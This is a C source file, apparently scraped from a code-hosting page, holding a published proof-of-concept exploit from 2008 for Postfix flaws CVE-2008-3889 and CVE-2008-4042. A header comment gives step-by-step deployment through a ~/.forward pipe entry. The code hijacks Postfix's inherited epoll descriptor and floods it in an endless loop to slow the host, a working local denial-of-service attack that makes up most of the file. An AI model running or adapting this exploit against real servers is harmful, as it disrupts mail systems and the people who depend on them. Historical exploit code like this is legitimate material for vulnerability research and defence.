116 lines
No EOL
2.9 KiB
C
116 lines
No EOL
2.9 KiB
C
/*
|
|
* http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c
|
|
* http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c
|
|
*
|
|
* Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6
|
|
* before 2.6-20080902, when used with the Linux 2.6 kernel.
|
|
*
|
|
* CVE-2008-3889 & CVE-2008-4042
|
|
*
|
|
* by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
|
|
* and Marc Morata Fité <marc.morata.fite[at]gmail[dot]com>
|
|
* 2008-09-16
|
|
*
|
|
* This Proof of concept creates a pipe and adds it in the postfix's epoll
|
|
* file descriptor.
|
|
* When the pipe is added, an endless loop will launch lots of events to the
|
|
* local and master postfix processes.
|
|
* This will slowdown de system a lot.
|
|
*
|
|
* An example of use:
|
|
* 1- Put the content "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with
|
|
* the double quotes)
|
|
* in the file ~/.forward
|
|
*
|
|
* 2- Put the CVE-2008-4042-exploit in your home
|
|
* gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit
|
|
*
|
|
* 3- Send and email to the user
|
|
*
|
|
* You can see the output at /tmp/postfix.log
|
|
*/
|
|
|
|
|
|
#include <sys/epoll.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <unistd.h>
|
|
#include <dirent.h>
|
|
#include <errno.h>
|
|
|
|
#define FDOPEN 200
|
|
|
|
|
|
void add_fd(int fde, int fd) {
|
|
printf("[*] Adding fd %d to eventpoll %d\n", fd, fde);
|
|
static struct epoll_event ev;
|
|
ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;
|
|
errno =0;
|
|
// If this is a socket fd, the load is high
|
|
ev.data.u32 = 6;
|
|
ev.data.u64 = 6;
|
|
|
|
if (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {
|
|
printf(" => Fd %d added!\n", fd);
|
|
} else {
|
|
printf(" => Error (%d) adding fd %d\n", errno, fd);
|
|
}
|
|
}
|
|
|
|
int main(int argc, char *argv[]) {
|
|
|
|
int fds[2];
|
|
char dir[32], c;
|
|
int i, found = 0;
|
|
|
|
pipe(fds);
|
|
sprintf(dir, "/proc/%d/fd", getpid());
|
|
printf("[*] Opening directory %s\n", dir);
|
|
DIR *fd_dir = opendir(dir);
|
|
struct dirent *de = readdir(fd_dir);
|
|
|
|
// We are looking for the eventpoll file descriptor
|
|
while (de != NULL) {
|
|
char link_d[256];
|
|
char link_f[256];
|
|
memset(link_d, 0, 256);
|
|
sprintf(link_f, "%s/%s", dir, de->d_name);
|
|
readlink(link_f, link_d, 256);
|
|
if ( strstr(link_d, "eventpoll") ) {
|
|
found = 1;
|
|
printf(" => %s points to %s\n", de->d_name, link_d);
|
|
add_fd(atoi(de->d_name), fds[0]);
|
|
// We can test with more than one triggered event at once
|
|
for (i = 0; i<FDOPEN; i++)
|
|
add_fd(atoi(de->d_name),dup(fds[0]));
|
|
}
|
|
de = readdir(fd_dir);
|
|
}
|
|
closedir(fd_dir);
|
|
|
|
if (found == 0) {
|
|
printf("[!] Are you sure that your postfix is vulnerable?\n");
|
|
printf("[!] Are you launching me throw a .forward file?\n");
|
|
exit(0);
|
|
}
|
|
|
|
printf("[*] Starting to flood the system!\n");
|
|
fflush(stdout);
|
|
close(0);
|
|
close(1);
|
|
close(2);
|
|
|
|
// This triggers the events
|
|
while (1) {
|
|
write(fds[1], "A",1);
|
|
read(fds[0],&c, 1);
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2008-09-16]
|